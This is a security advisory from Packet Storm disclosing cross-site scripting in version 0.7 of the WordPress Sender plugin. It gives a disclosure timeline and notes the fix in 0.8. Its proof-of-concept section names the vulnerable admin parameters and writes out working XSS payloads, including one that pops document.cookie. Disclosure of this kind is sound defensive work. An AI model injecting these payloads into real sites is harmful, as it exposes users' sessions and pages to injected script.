WordPress Sender 0.7 Cross Site Scripting

2015-12-17T00:00:00
ID PACKETSTORM:134921
Type packetstorm
Reporter Madhu Akula
Modified 2015-12-17T00:00:00

Description

                                        
                                            `Plugin Name : Sender  
  
Effected Version : 0.7 (and most probably lower version's if any)  
  
Vulnerability : A3-Cross-Site Scripting (XSS)  
  
Identified by : Madhu Akula  
  
  
  
Technical Details  
  
Minimum Level of Access Required : Administrator  
  
PoC - (Proof of Concept) :  
  
The following fields put the payload as below  
  
http://localhost/wp-admin/admin.php?page=sndr_settings&action=go_pro  
bws_license_key = “><img src=x onerror=prompt(document.cookie);>  
  
http://localhost/wp-admin/admin.php?page=sndr_settings  
sndr_from_custom_name = “><script>alert(1)</script>  
sndr_from_email = “><script>alert(2)</script>  
  
Vulnerable Parameter : bws_license_key, sndr_from_custom_name, sndr_from_email  
  
Type of XSS : Reflected / Stored  
  
Fixed in : 0.8  
  
http://wordpress.org/plugins/sender/changelog/  
  
Disclosure Timeline  
  
Vendor Contacted : 2014-08-04  
  
Plugin Status : Updated on 2014-08-07  
  
Public Disclosure : October 3, 2015  
  
CVE Number : Not assigned yet  
  
Plugin Description :  
  
This plugin allows you send mails to all users or to certain categories of users via several clicks. To send letters, you can use the php functions such as sending emails, wordpress functions, or send an email through the SMTP server. Also, the plugin provides a bulk mailing for a certain period of time.  
`